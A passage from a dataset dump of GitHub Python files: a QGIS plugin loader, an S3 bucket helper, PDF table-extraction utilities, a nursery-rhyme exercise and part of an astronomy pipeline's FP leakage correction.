NetworkResponse(reply).get_qt_property(keys)))\n self.params_queue.gen_retry_params(**params)\n # try to reauth, then continue run loop\n self.con_auth.start(self.get_conn_info())\n\n\nclass IMLInitUploadLayerController(InitUploadLayerController):\n CLS_PARAMS_QUEUE = queue.SimpleRetryQueue\n\n\nclass IMLUploadLayerController(IMLAuthExtension, UploadLayerController):\n def __init__(self, network, *a, **kw):\n UploadLayerController.__init__(self, network, *a, **kw)\n IMLAuthExtension.__init__(self, network, *a, **kw)\n\n def _retry_with_auth(self, reply):\n # retried params\n self.lst_added_feat.retry_params()\n # try to reauth, then continue run loop\n self.con_auth.start(self.get_conn_info())\n\n\nclass IMLEditSyncController(IMLAuthExtension, EditSyncController):\n CLS_PARAMS_QUEUE = queue.SimpleRetryQueue\n\n def __init__(self, network, *a, **kw):\n EditSyncController.__init__(self, network, *a, **kw)\n IMLAuthExtension.__init__(self, network, *a, **kw)\n\n def _retry_with_auth(self, reply):\n # retried params\n self.lst_added_feat.retry_params()\n self.removed_feat.retry_params()\n # try to reauth, then continue run loop\n self.con_auth.start(self.get_conn_info())\n","repo_name":"heremaps/xyz-qgis-plugin","sub_path":"XYZHubConnector/xyz_qgis/iml/loader/iml_layer_loader.py","file_name":"iml_layer_loader.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"5"} +{"seq_id":"73504587672","text":"import boto3\n\nclass s3_output_bucket:\n def __init__(self, bucket_name):\n self.bucket_name = bucket_name\n self.client = boto3.client(\"s3\")\n self.response = None\n \n def create_bucket(self):\n print(\"Creating output bucket...\")\n response = self.client.create_bucket(\n Bucket = self.bucket_name\n )\n return response\n \n def delete_bucket(self):\n print(\"Deleting S3 output bucket...\")\n self.clear_bucket()\n self.response = self.client.delete_bucket(\n Bucket = self.bucket_name\n )\n return self.response\n\n #Citation: learned how to clear s3 bucket with boto3 from Stack Overflow\n #Link: https://stackoverflow.com/questions/43326493/what-is-the-fastest-way-to-empty-s3-bucket-using-boto3/43328646\n def clear_bucket(self):\n s3 = boto3.resource(\"s3\")\n bucket = s3.Bucket(self.bucket_name)\n bucket.objects.all().delete()\n\n#Create Bucket for Debugging\nif __name__ == \"__main__\":\n import time\n newbucket = s3_output_bucket(\"talia-4452-f21-thien-output-bucket\")\n newbucket.create_bucket()\n time.sleep(10)\n newbucket.delete_bucket()","repo_name":"thienlongtran/sma-pipeline","sub_path":"infrastructure/s3_output.py","file_name":"s3_output.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26636921903","text":"import numpy as np\nimport dateparser\nimport camelot\nimport tabula\nimport pdfplumber\nimport pandas as pd\nimport math\nimport gc\n\nfrom pdfminer.high_level import extract_pages\nfrom camelot.core import TableList\nfrom utils.tabledetection.tabnet import ExtractTable\n\n\ndef clean_numbers_str(text):\n chars = ['%', '*']\n\n if type(text) != str or text is None:\n return text\n\n for ch in chars:\n text = text.replace(ch, '')\n \n return text.strip()\n\n\ndef are_keywords_in_table(df, keywords):\n\n found = []\n table = [df.columns.values.tolist()] + df.values.tolist()\n table = [x.lower().strip().replace(\"\\n\", \"\") for x in np.array(table).flatten()]\n\n for word in keywords:\n for text 
in table:\n if word in text:\n found.append(word)\n break\n \n return len(keywords) == len(found)\n\n\ndef find_table_by_keywords(tables, keywords):\n\n for table in tables:\n if isinstance(table, pd.DataFrame):\n table_df = table\n else:\n table_df = table.df\n\n if are_keywords_in_table(table_df, keywords):\n return table_df\n return None\n\n\ndef find_all_tables_by_keywords(tables, keywords):\n result = []\n for table in tables:\n table_df = table.df\n if are_keywords_in_table(table_df, keywords):\n result.append(table_df)\n return result\n\n\ndef convert_df_to_dict(df, key_idx, val_idx, remove_nan=True):\n keys = df.values[:, key_idx]\n vals = df.values[:, val_idx]\n\n if remove_nan:\n df_dict = dict()\n\n for k, v in zip(keys, vals):\n if type(k) == float and k != k:\n continue\n df_dict[k] = v\n else:\n df_dict = {k:v for (k, v) in zip(keys, vals)}\n\n return df_dict\n\ndef add_values_from_neighbors(df, df_dict, key_idx, val_idx):\n # idea is to check till when is the value empty and all hose indices\n # in value should go to the current index\n # for example consider key list [\"\", \"total number #\", \"\"]\n # and value list [\"\", \"\", \"12345\"]\n # it is happening in case of Tamil Nadu table on Page number 2\n # consider this to be a sort of a patch\n keys = df.values[:, key_idx]\n vals = df.values[:, val_idx]\n keys_list = keys.tolist()\n length = len(keys)\n\n for k, v in df_dict.items():\n # check if the dict doesnt have any value\n if k in df_dict and df_dict[k] == \"\":\n value = \"\"\n index = keys_list.index(k)\n # check previous neighbors\n counter = 1\n check_previous_neighbor = True\n if index - 1 > 0 and keys[index - 1] == \"\":\n # prepend the value\n value = vals[index - counter] + value\n\n # check next neighbors\n if index + 1 < length and keys[index + counter] == \"\":\n # append the value\n value += vals[index + counter]\n\n df_dict[k] = value\n\n return df_dict\n\n\ndef extract_info_from_table_by_keywords(df_dict, keymap):\n\n result = {}\n for text, val in df_dict.items():\n for id, keys in keymap.items():\n if False in [key in text.lower() for key in keys]:\n continue\n result[id] = val\n\n return result\n\n\ndef parse_dates(datestr):\n\n date = dateparser.parse(datestr)\n datestr = f'{date.year}-{date.month:02d}-{date.day:02d}'\n return datestr\n\n\ndef n_pages_in_pdf(pdf_fpath):\n pages = list(extract_pages(pdf_fpath))\n return len(pages)\n\n\ndef get_tables_from_pdf_camelot(pdf_fpath, pages=None, strip_text='\\n', split_text=True, use_stream=False):\n pagerange = \"1-end\" if pages is None else ','.join(map(str, pages))\n _flavor = \"stream\" if use_stream else \"lattice\"\n tables = camelot.read_pdf(pdf_fpath, pages=pagerange, flavor=_flavor, strip_text=strip_text, split_text=split_text)\n gc.collect()\n return tables\n\n\ndef get_tables_from_pdf_tabula(pdf_fpath, pages=None):\n pagerange = \"all\" if pages is None else pages\n tables = tabula.read_pdf(pdf_fpath, pages=pagerange)\n gc.collect()\n return tables\n\n\ndef get_tables_from_pdf_with_smart_boundary_detection(library, pdf_fpath, pages, kwargs):\n\n if library.lower().strip() == 'camelot':\n # Use CascadeTabNet model to identify table boundaries in the PDF\n # Use the detected boundaries to extract tables using Camelot library\n # for better extraction\n\n boundary_detection = ExtractTable(pdf_fpath, pagenums=pages, origin='bottom-left')\n tablesdict = boundary_detection.extract() # dictionary of page nums -> list of table boundaries\n result = []\n\n del boundary_detection\n gc.collect()\n\n 
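# Note on the Camelot call below: each boundary is passed as an \"x1,y1,x2,y2\" string in PDF coordinates (origin bottom-left, matching the ExtractTable call above); with flavor=\"stream\" Camelot takes them as exact table_areas, while flavor=\"lattice\" takes broader table_regions to search within.\n        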
camelot_splittext = kwargs.get('split_text', True)\n camelot_flavor = kwargs.get('flavor', 'lattice')\n\n camelot_kwargs = {\n 'split_text': camelot_splittext,\n 'flavor': camelot_flavor,\n 'strip_text': '\\n'\n }\n\n for pageno, table_bounds in tablesdict.items():\n bound_str = [','.join(map(str, bound)) for bound in table_bounds]\n\n if camelot_flavor == 'stream':\n camelot_kwargs['table_areas'] = bound_str\n elif camelot_flavor == 'lattice':\n camelot_kwargs['table_regions'] = bound_str\n\n pagetables = camelot.read_pdf(pdf_fpath, pages=f'{pageno+1}', **camelot_kwargs)\n result.extend(pagetables._tables)\n\n result = TableList(result)\n gc.collect()\n return result\n\n elif library.lower().strip() == 'tabula':\n\n boundary_detection = ExtractTable(pdf_fpath, pagenums=pages, origin='top-left')\n tablesdict = boundary_detection.extract()\n result = []\n\n del boundary_detection\n gc.collect()\n\n for pageno, table_bounds in tablesdict.items():\n\n tabula_bounds = [[y1, x1, y2, x2] for (x1, y1, x2, y2) in table_bounds]\n pagetables = tabula.read_pdf(\n pdf_fpath, pages=pageno+1, area=tabula_bounds\n )\n result.extend(pagetables)\n \n gc.collect()\n return result\n\n else:\n raise NotImplementedError('Smart boundary understanding with library other than Camelot not yet implemented')\n\n\ndef get_tables_from_pdf(library, pdf_fpath, pages=None, smart_boundary_detection=False, **kwargs):\n\n if smart_boundary_detection:\n return get_tables_from_pdf_with_smart_boundary_detection(\n library, pdf_fpath, pages, kwargs\n )\n else:\n if library.lower().strip() == 'camelot':\n return get_tables_from_pdf_camelot(pdf_fpath, pages, **kwargs)\n elif library.lower().strip() == 'tabula':\n return get_tables_from_pdf_tabula(pdf_fpath, pages)\n\n\ndef get_pageno_with_text(pdf_fpath, keywords, start_page=None, end_page=None):\n\n with pdfplumber.open(pdf_fpath) as pdf:\n for page in pdf.pages:\n\n pageno = page.page_number\n\n if start_page is not None and pageno < start_page:\n continue\n if end_page is not None and pageno > end_page:\n continue\n\n pagetext = page.extract_text().lower()\n keywords_found = [\n keyword.lower() in pagetext \n for keyword in keywords\n ]\n\n if False not in keywords_found: # all keywords found:\n return pageno\n\n return None\n","repo_name":"IBM/covid19-india-data","sub_path":"data_extractor/local_extractor/utils/common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":7426,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"5"} +{"seq_id":"13840591996","text":"this = [\n \"house that Jack built.\",\n \"malt\",\n \"rat\",\n \"cat\",\n \"dog\",\n \"cow with the crumpled horn\",\n \"maiden all forlorn\",\n \"man all tattered and torn\",\n \"priest all shaven and shorn\",\n \"rooster that crowed in the morn\",\n \"farmer sowing his corn\",\n \"horse and the hound and the horn\"\n]\n\nthat = [\n\"belonged to\",\n\"kept\",\n\"woke\",\n\"married\",\n\"kissed\",\n\"milked\",\n\"tossed\",\n\"worried\",\n\"killed\",\n\"ate\",\n\"lay in\",\n]\n\ndef recite(start_verse, end_verse):\n result = []\n for i in range(start_verse - 1, end_verse):\n result.append(verse(i))\n return result\n\ndef verse(n):\n verse = f'This is the {this[n]}'\n for k in range(n, 0, -1): \n verse += f' that {that[-k]} the {this[k-1]}'\n return 
verse\n","repo_name":"AndrejTS/python-exercises","sub_path":"house/house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39228064077","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nApero FP leakage functionality\n\nCreated on 2022-01-26\n\n@author: cook\n\"\"\"\nimport os\nimport warnings\nfrom typing import Dict, List, Optional, Tuple, Union\n\nimport numpy as np\nfrom astropy import constants as cc\nfrom astropy import units as uu\nfrom astropy.table import Table\n\nfrom apero import lang\nfrom apero.base import base\nfrom apero.core import constants\nfrom apero.core import math as mp\nfrom apero.core.core import drs_database\nfrom apero.core.core import drs_log, drs_file\nfrom apero.core.utils import drs_recipe\nfrom apero.science.calib import gen_calib\nfrom apero.science.calib import wave\nfrom apero.science.extract import gen_ext\n\n# =============================================================================\n# Define variables\n# =============================================================================\n__NAME__ = 'science.calib.leak.py'\n__INSTRUMENT__ = 'None'\n__PACKAGE__ = base.__PACKAGE__\n__version__ = base.__version__\n__author__ = base.__author__\n__date__ = base.__date__\n__release__ = base.__release__\n# get param dict\nParamDict = constants.ParamDict\nDrsFitsFile = drs_file.DrsFitsFile\nDrsNpyFile = drs_file.DrsNpyFile\nDrsRecipe = drs_recipe.DrsRecipe\n# Get Logging function\nWLOG = drs_log.wlog\n# Get the text types\ntextentry = lang.textentry\n# alias pcheck\npcheck = constants.PCheck(wlog=WLOG)\n# define the calibration database class\nCalibrationDatabase = drs_database.CalibrationDatabase\n# -----------------------------------------------------------------------------\n# Speed of light\n# noinspection PyUnresolvedReferences\nspeed_of_light_ms = cc.c.to(uu.m / uu.s).value\n# noinspection PyUnresolvedReferences\nspeed_of_light_kms = cc.c.to(uu.km / uu.s).value\n# Get function string\ndisplay_func = drs_log.display_func\n\n\n# =============================================================================\n# Define leakage functions\n# =============================================================================\ndef correct_ref_dark_fp(params: ParamDict, extractdict: ParamDict,\n bckgrd_percentile: Optional[int] = None,\n norm_percentile: Optional[int] = None,\n wsmooth: Optional[int] = None,\n kersize: Optional[int] = None\n ) -> Tuple[Dict[str, DrsFitsFile], ParamDict]:\n \"\"\"\n Correction for the reference dark fp\n\n :param params: ParamDict, parameter dictionary of constants\n :param extractdict: ParamDict, the extraction parameter dictionary\n :param bckgrd_percentile: int or None, optional, the thermal background\n percentile, overrides\n params['LEAK_BCKGRD_PERCENTILE']\n :param norm_percentile: int or None, optional, the normalisation percentile\n overrides params['LEAK_NORM_PERCENTILE']\n :param wsmooth: int or None, optional, the e-width of the smoothing kernel,\n overrides params['LEAKREF_WSMOOTH']\n :param kersize: int or None, optional, the kernel size, overrides\n params['LEAKREF_KERSIZE']\n\n :return: tuple, 1. the output diction of corrected fits file classes\n (keys are for each fiber)\n 2. 
the leak correction parameter dictionary\n \"\"\"\n # set function name\n func_name = __NAME__ + '.correct_ref_dark_fp'\n # load parameters from params/kwargs\n bckgrd_percentile = pcheck(params, 'LEAK_BCKGRD_PERCENTILE', func=func_name,\n override=bckgrd_percentile)\n norm_percentile = pcheck(params, 'LEAK_NORM_PERCENTILE', func=func_name,\n override=norm_percentile)\n w_smooth = pcheck(params, 'LEAKREF_WSMOOTH', func=func_name,\n override=wsmooth)\n ker_size = pcheck(params, 'LEAKREF_KERSIZE', func=func_name,\n override=kersize)\n # define a gaussian kernel that goes from +/- ker_size * w_smooth\n xkernel = np.arange(-ker_size * w_smooth, ker_size * w_smooth)\n ykernel = np.exp(-0.5 * (xkernel / w_smooth) ** 2)\n\n # get this instruments science fibers and reference fiber\n pconst = constants.pload()\n # science fibers should be list of strings, reference fiber should be string\n sci_fibers, ref_fiber = pconst.FIBER_KINDS()\n # output storage (dictionary of corrected extracted files)\n outputs = dict()\n # ----------------------------------------------------------------------\n # Deal with loading the reference fiber image props\n # ----------------------------------------------------------------------\n # check for reference fiber in extract dict\n if ref_fiber not in extractdict:\n eargs = [ref_fiber, ', '.join(extractdict.keys()), func_name]\n WLOG(params, 'error', textentry('00-016-00024', args=eargs))\n # get the reference file\n reffile = extractdict[ref_fiber]\n # get dprtype\n dprtype = reffile.get_hkey('KW_DPRTYPE')\n # get dpr type for ref image\n refdpr = pconst.FIBER_DPR_POS(dprtype, ref_fiber)\n # check that refdpr is FP (must be an FP)\n if refdpr != 'FP':\n # log and raise error\n eargs = [ref_fiber, dprtype, func_name]\n WLOG(params, 'error', textentry('00-016-00025', args=eargs))\n\n # get the data for the reference image\n refimage = reffile.get_data(copy=True)\n # get reference image size\n nord, nbpix = refimage.shape\n # ----------------------------------------------------------------------\n # remove the pedestal from the reference image and work out the amplitude\n # of the leak from the reference fiber\n # ----------------------------------------------------------------------\n # storage\n ref_amps = np.zeros_like(refimage)\n # loop around the orders\n for order_num in range(nord):\n # remove the pedestal from the FP to avoid an offset from\n # thermal background\n background = mp.nanpercentile(refimage[order_num], bckgrd_percentile)\n refimage[order_num] = refimage[order_num] - background\n # get the amplitudes\n amplitude = mp.nanpercentile(refimage[order_num], norm_percentile)\n ref_amps[order_num] = amplitude\n # normalize the reference image by this amplitude\n refimage[order_num] = refimage[order_num] / amplitude\n\n # save corrected refimage into output storage\n reffile.data = refimage\n outputs[ref_fiber] = reffile\n\n # ----------------------------------------------------------------------\n # process the science fibers\n # ----------------------------------------------------------------------\n for sci_fiber in sci_fibers:\n # check that science fiber is in extraction dictionary\n if sci_fiber not in extractdict:\n eargs = [sci_fiber, ', '.join(extractdict.keys()), func_name]\n WLOG(params, 'error', textentry('00-016-00026', args=eargs))\n # get the science image\n scifile = extractdict[sci_fiber]\n # get the data for the reference image\n sciimage = scifile.get_data(copy=True)\n # get the science image size\n nord, nbpix = sciimage.shape\n # loop 
around orders\n for order_num in range(nord):\n # median filtering has to be an odd number\n medfac = 2 * (w_smooth // 2) + 1\n # calculate median filter\n tmpimage = mp.medfilt_1d(sciimage[order_num], medfac)\n # set NaN pixels to zero\n tmpimage[np.isnan(tmpimage)] = 0\n # find a proxy for the low-frequency in the science channel\n mask = np.ones_like(tmpimage)\n mask[tmpimage == 0] = 0\n # calculate low-frequency\n part1 = np.convolve(tmpimage, ykernel, mode='same')\n part2 = np.convolve(mask, ykernel, mode='same')\n with warnings.catch_warnings(record=True) as _:\n low_f = part1 / part2\n # remove the low-frequencies from science image\n sciimage[order_num] = sciimage[order_num] - low_f\n # normalize by the reference amplitudes\n sciimage[order_num] = sciimage[order_num] / ref_amps[order_num]\n # save corrected science image into output storage\n scifile.data = sciimage\n outputs[sci_fiber] = scifile\n # ----------------------------------------------------------------------\n # Make properties dictionary\n props = ParamDict()\n props['LEAK_BCKGRD_PERCENTILE'] = bckgrd_percentile\n props['LEAK_NORM_PERCENTILE'] = norm_percentile\n props['LEAKREF_WSMOOTH'] = w_smooth\n props['LEAKREF_KERSIZE'] = ker_size\n # set sources\n keys = ['LEAK_BCKGRD_PERCENTILE', 'LEAK_NORM_PERCENTILE',\n 'LEAKREF_WSMOOTH', 'LEAKREF_KERSIZE']\n props.set_sources(keys, func_name)\n # ----------------------------------------------------------------------\n # return output dictionary with corrected extracted files\n return outputs, props\n\n\ndef manage_leak_correction(params: ParamDict, recipe: DrsRecipe,\n eprops: ParamDict, infile: DrsFitsFile,\n fiber: str,\n ref_e2ds: Optional[np.ndarray] = None) -> ParamDict:\n \"\"\"\n Manage the leak correction\n\n :param params: ParamDict, parameter dictionary of constants\n :param recipe: DrsRecipe, the recipe instance that called this function\n :param eprops: ParamDict, parameter dictionary of extraction data\n :param infile: DrsFitsFile, the input drs file instance (for header)\n :param ref_e2ds: np.ndarray, the reference fiber e2ds\n :param fiber: str, the fiber we are correcting (we only correct science\n fibers)\n\n :return: ParamDict, the updated extraction data parameter dictionary\n \"\"\"\n # set the function name\n func_name = __NAME__ + '.manage_leak_correction()'\n # get dprtype\n dprtype = infile.get_hkey('KW_DPRTYPE', dtype=str)\n # get the ut file header\n inheader = infile.header\n # get this instruments science fibers and reference fiber\n pconst = constants.pload()\n # science fibers should be list of strings, reference fiber should be string\n sci_fibers, ref_fiber = pconst.FIBER_KINDS()\n # get the type of data for each fiber\n ref_type = pconst.FIBER_DATA_TYPE(dprtype, ref_fiber)\n # get vectors from eprops\n uncorr_e2ds = np.array(eprops['E2DS'])\n e2ds = np.array(eprops['E2DS'])\n # ----------------------------------------------------------------------\n # set reason not corrected\n reason = ''\n # deal with quick look\n quicklook = params['EXT_QUICK_LOOK']\n # add to reason\n if quicklook:\n reason += 'QUICKLOOK=True '\n # deal with wanting to do leak correction\n cond1 = not params['INPUTS']['LEAKCORR']\n # add to reason\n if cond1:\n if params['CORRECT_LEAKAGE']:\n reason += '--leakcorr=False '\n else:\n reason += 'CORRECT_LEAKAGE=False '\n # deal with correct fiber\n cond2 = fiber not in sci_fibers\n # add to reason\n if cond2:\n reason += 'FIBER={0} '.format(fiber)\n # make sure reference fiber is an FP\n cond3 = ref_type not in 
params.listp('LEAKAGE_REF_TYPES', dtype=str)\n # add to reason\n if cond3:\n reason += 'REFTYPE={0} '.format(ref_type)\n # deal with no reference image\n cond4 = ref_e2ds is None\n if cond4:\n reason += 'REF_E2DS=None '\n # if any of these conditions are true do not correct for dark_fp\n if quicklook or cond1 or cond2 or cond3 or cond4:\n # add used parametersLEAK_CORRECTED\n eprops['LEAK_2D_EXTRACT_FILES_USED'] = 'No leak'\n eprops['LEAK_EXTRACT_FILE_USED'] = 'No leak'\n eprops['LEAK_BCKGRD_PERCENTILE_USED'] = 'No leak'\n eprops['LEAK_NORM_PERCENTILE_USED'] = 'No leak'\n eprops['LEAK_LOW_PERCENTILE_USED'] = 'No leak'\n eprops['LEAK_HIGH_PERCENTILE_USED'] = 'No leak'\n eprops['LEAK_BAD_RATIO_OFFSET_USED'] = 'No leak'\n eprops['LEAK_CORRECTED'] = False\n eprops['LEAKREF_FILE'] = 'No leak'\n eprops['LEAKREF_TIME'] = 'No leak'\n eprops['LEAKREF_REFFILE'] = 'No leak'\n eprops['LEAKREF_REFTIME'] = 'No leak'\n # set sources\n keys = ['LEAK_2D_EXTRACT_FILES_USED', 'LEAK_EXTRACT_FILE_USED',\n 'LEAK_BCKGRD_PERCENTILE_USED', 'LEAK_NORM_PERCENTILE_USED',\n 'LEAK_LOW_PERCENTILE_USED', 'LEAK_HIGH_PERCENTILE_USED',\n 'LEAK_BAD_RATIO_OFFSET_USED', 'LEAKREF_FILE', 'LEAKREF_TIME',\n 'LEAKREF_REFFILE', 'LEAKREF_REFTIME']\n eprops.set_sources(keys, func_name)\n # add updated e2ds\n eprops['UNCORR_E2DS'] = uncorr_e2ds\n eprops['E2DS'] = e2ds\n eprops['LEAKCORR'] = np.full_like(e2ds.shape, np.nan)\n # print progress\n WLOG(params, 'info', textentry('40-016-00034', args=[reason]))\n # return update extraction properties\n return eprops\n # -------------------------------------------------------------------------\n # print progress\n WLOG(params, 'info', textentry('40-016-00033', args=[fiber, dprtype]))\n # correct for leak\n e2ds, leakcorr, props = correct_ext_dark_fp(params, e2ds, ref_e2ds,\n inheader, fiber,\n database=None)\n # add used parameters\n for key in props:\n eprops.set(key, props[key], source=props.sources[key])\n # add updated e2ds\n eprops['UNCORR_E2DS'] = uncorr_e2ds\n eprops['E2DS'] = e2ds\n eprops['LEAKCORR'] = leakcorr\n eprops['LEAK_CORRECTED'] = True\n\n # ------------------------------------------------------------------\n # Add debugs for all uncorrected file\n # ------------------------------------------------------------------\n save_uncorrected_ext_fp(params, recipe, infile, eprops, fiber)\n\n # return update extraction properties\n return eprops\n\n\ndef correct_ext_dark_fp(params: ParamDict, sciimage: np.ndarray,\n refimage: np.ndarray, header: drs_file.Header,\n fiber: str,\n database: Optional[CalibrationDatabase] = None,\n leak2dext: Optional[List[str]] = None,\n extfiletype: Optional[str] = None,\n bckgrd_percentile: Optional[float] = None,\n norm_percentile: Optional[float] = None,\n low_percentile: Optional[float] = None,\n high_percentile: Optional[float] = None,\n bad_ratio: Optional[float] = None\n ) -> Tuple[np.ndarray, np.ndarray, ParamDict]:\n \"\"\"\n Correct the extracted file using the dark fp leak reference file\n\n :param params: ParamDict, parameter dictionary of constants\n :param sciimage: numpy 2D array, the extracted image (science fiber)\n :param refimage: numpy 2D array, the extracted image (reference fiber)\n :param header: fits.Header, the input image header, used to get closest\n reference file\n :param fiber: str, the science fiber of the sciimage\n :param database: CalibrationDatabase instance or None, if None loads the\n calibration database instance, otherwise uses open one\n :param leak2dext: str, allowed extraction file format (overrides\n 
LEAK_2D_EXTRACT_FILES from parameters if defined)\n :param extfiletype: str, file to use for leak correction (e2ds or e2dsff)\n (overrides LEAK_EXTRACT_FILE from parameters if defined)\n :param bckgrd_percentile: float, the thermal background percentile for\n leak correction (overrides LEAK_BCKGRD_PERCENTILE\n from parameters if defined)\n :param norm_percentile: float, the normalisation percentile for leak\n correction (overrides LEAK_NORM_PERCENTILE from\n parameters if defined)\n :param low_percentile: float, lower bound percentile for leak correction\n (overrides LEAK_LOW_PERCENTILE from parameters if\n defined)\n :param high_percentile: float, upper bound percentile for leak correction\n (overrides LEAK_HIGH_PERCENTILE from parameters if\n defined)\n :param bad_ratio: float, limit on spruious FP ratio 1 +/- limit (overrides\n LEAK_BAD_RATIO_OFFSET from parameters if defined)\n\n :return: tuple, 1. the updated sciimage, 2. the ratios used in leak corr\n 3. leak correction parameter dictionary\n \"\"\"\n # set the function name\n func_name = __NAME__ + '.correct_ext_dark_fp()'\n # get properties from parameters\n leak2dext = pcheck(params, 'LEAK_2D_EXTRACT_FILES', func=func_name,\n override=leak2dext, mapf='list')\n extfiletype = pcheck(params, 'LEAK_EXTRACT_FILE', func=func_name,\n override=extfiletype)\n bckgrd_percentile = pcheck(params, 'LEAK_BCKGRD_PERCENTILE', func=func_name,\n override=bckgrd_percentile)\n norm_percentile = pcheck(params, 'LEAK_NORM_PERCENTILE', func=func_name,\n override=norm_percentile)\n low_percentile = pcheck(params, 'LEAK_LOW_PERCENTILE', func=func_name,\n override=low_percentile)\n high_percentile = pcheck(params, 'LEAK_HIGH_PERCENTILE', func=func_name,\n override=high_percentile)\n bad_ratio = pcheck(params, 'LEAK_BAD_RATIO_OFFSET', func=func_name,\n override=bad_ratio)\n # group bounding percentiles\n bpercents = [low_percentile, high_percentile]\n # get size of reference image\n nbo, nbpix = sciimage.shape\n # copy images\n refimage = np.array(refimage)\n sciimage = np.array(sciimage)\n # ----------------------------------------------------------------------\n # get this instruments science fibers and reference fiber\n pconst = constants.pload()\n # science fibers should be list of strings, reference fiber should be string\n sci_fibers, ref_fiber = pconst.FIBER_KINDS()\n # ----------------------------------------------------------------------\n # get ref leak reference for file\n lmout = get_leak_ref(params, header, ref_fiber, 'LEAKREF_E2DS',\n database=database)\n rleakfile, rleakref, rleaktime = lmout\n # get leak reference for fiber\n lmout = get_leak_ref(params, header, fiber, 'LEAKREF_E2DS',\n database=database)\n leakfile, leakref, leaktime = lmout\n # ----------------------------------------------------------------------\n # store the ratio of observe to reference\n ref_ratio_arr = np.zeros(nbo)\n dot_ratio_arr = np.zeros(nbo)\n approx_ratio_arr = np.zeros(nbo)\n # store the method used (either \"dot\" or \"approx\")\n method = []\n # loop around reference image orders and normalise by percentile\n for order_num in range(nbo):\n # get order values for reference\n global_ref_ord = rleakref[order_num]\n # remove the pedestal from the FP to avoid an offset from\n # thermal background\n background = mp.nanpercentile(refimage[order_num], bckgrd_percentile)\n refimage[order_num] = refimage[order_num] - background\n # only perform the measurement of the amplitude of the leakage signal\n # on the lower and upper percentiles. 
This allows for a small number\n # of hot/dark pixels along the order. Without this, we end up with\n # some spurious amplitude values in the frames\n with warnings.catch_warnings(record=True) as _:\n # get percentiles\n low, high = mp.nanpercentile(refimage[order_num], bpercents)\n lowm, highm = mp.nanpercentile(global_ref_ord, bpercents)\n # translate this into a mask\n mask = refimage[order_num] > low\n mask &= refimage[order_num] < high\n mask &= global_ref_ord > lowm\n mask &= global_ref_ord < highm\n # approximate ratio, we know that frames were normalized with their\n # \"norm_percentile\" percentile prior to median combining\n amplitude = mp.nanpercentile(refimage[order_num], norm_percentile)\n approx_ratio = 1 / amplitude\n # save to storage\n approx_ratio_arr[order_num] = float(approx_ratio)\n # much more accurate ratio from a dot product\n part1 = mp.nansum(global_ref_ord[mask] * refimage[order_num][mask])\n part2 = mp.nansum(refimage[order_num][mask] ** 2)\n ratio = part1 / part2\n # save to storage\n dot_ratio_arr[order_num] = float(ratio)\n # deal with spurious ref FP ratio\n cond1 = (ratio / approx_ratio) < (1 - bad_ratio)\n cond2 = (ratio / approx_ratio) > (1 + bad_ratio)\n # Ratio must be within (1-badratio) to (1+badratio) of the approximate\n # ratio -- otherwise ratio is bad\n if cond1 or cond2:\n # log warning that ref FP ratio is spurious\n wargs = [order_num, ratio, approx_ratio, ratio / approx_ratio,\n 1 - bad_ratio, 1 + bad_ratio]\n WLOG(params, 'warning', textentry('10-016-00024', args=wargs),\n sublevel=4)\n # set the ratio to the approx ratio\n ratio = float(approx_ratio)\n # set the ratio method\n method.append('approx')\n else:\n # set method\n method.append('dot')\n # save ratios to storage\n ref_ratio_arr[order_num] = float(ratio)\n # --------------------------------------------------------------\n # storage for the ratio of leakage\n ratio_leak = np.zeros(nbo)\n # loop around orders\n for order_num in range(nbo):\n # scale the leakage for that order to the observed amplitude\n scale = leakref[order_num] / ref_ratio_arr[order_num]\n # apply leakage scaling\n sciimage[order_num] = sciimage[order_num] - scale\n # calculate the ratio of the leakage\n rpart1 = mp.nanpercentile(sciimage[order_num], norm_percentile)\n rpart2 = mp.nanmedian(sciimage[order_num])\n ratio_leak[order_num] = rpart1 / rpart2\n\n # ----------------------------------------------------------------------\n # generate a properties dictionary\n props = ParamDict()\n # ----------------------------------------------------------------------\n # add used parameters\n props['LEAK_2D_EXTRACT_FILES_USED'] = leak2dext\n props['LEAK_EXTRACT_FILE_USED'] = extfiletype\n props['LEAK_BCKGRD_PERCENTILE_USED'] = bckgrd_percentile\n props['LEAK_NORM_PERCENTILE_USED'] = norm_percentile\n props['LEAK_LOW_PERCENTILE_USED'] = low_percentile\n props['LEAK_HIGH_PERCENTILE_USED'] = high_percentile\n props['LEAK_BAD_RATIO_OFFSET_USED'] = bad_ratio\n props['LEAKREF_FILE'] = leakfile\n props['LEAKREF_TIME'] = leaktime\n props['LEAKREF_REFFILE'] = rleakfile\n props['LEAKREF_REFTIME'] = rleaktime\n # set sources\n keys = ['LEAK_2D_EXTRACT_FILES_USED', 'LEAK_EXTRACT_FILE_USED',\n 'LEAK_BCKGRD_PERCENTILE_USED', 'LEAK_NORM_PERCENTILE_USED',\n 'LEAK_LOW_PERCENTILE_USED', 'LEAK_HIGH_PERCENTILE_USED',\n 'LEAK_BAD_RATIO_OFFSET_USED', 'LEAKREF_FILE', 'LEAKREF_TIME',\n 'LEAKREF_REFFILE', 'LEAKREF_REFTIME']\n props.set_sources(keys, func_name)\n # ----------------------------------------------------------------------\n # return 
properties\n    return sciimage, ratio_leak, props\n\n\ndef get_leak_ref(params: ParamDict, header: drs_file.Header, fiber: str,\n                 kind: str, filename: Optional[str] = None,\n                 database: Optional[CalibrationDatabase] = None\n                 ) -> Tuple[str, np.ndarray, float]:\n    \"\"\"\n    Get the leak reference file from the calibration database\n\n    :param params: ParamDict, parameter dictionary of constants\n    :param header: fits Header, the header to get the time for the closest\n                   leak reference file\n    :param fiber: str, the fiber to get the leak reference file for\n    :param kind: str, the DrsInputFile name\n    :param filename: str or None, if set this is the leak reference file used\n    :param database: Calibration database instance or None, if None we reload\n                     the calibration database\n    :return: tuple, 1. the leak ref filename, 2. the leak ref image,\n             3. the observation time of the leak reference file\n    \"\"\"\n    # get file definition\n    out_leak = drs_file.get_file_definition(params, kind, block_kind='red')\n    # get key\n    key = out_leak.get_dbkey()\n    # ----------------------------------------------------------------------\n    # load 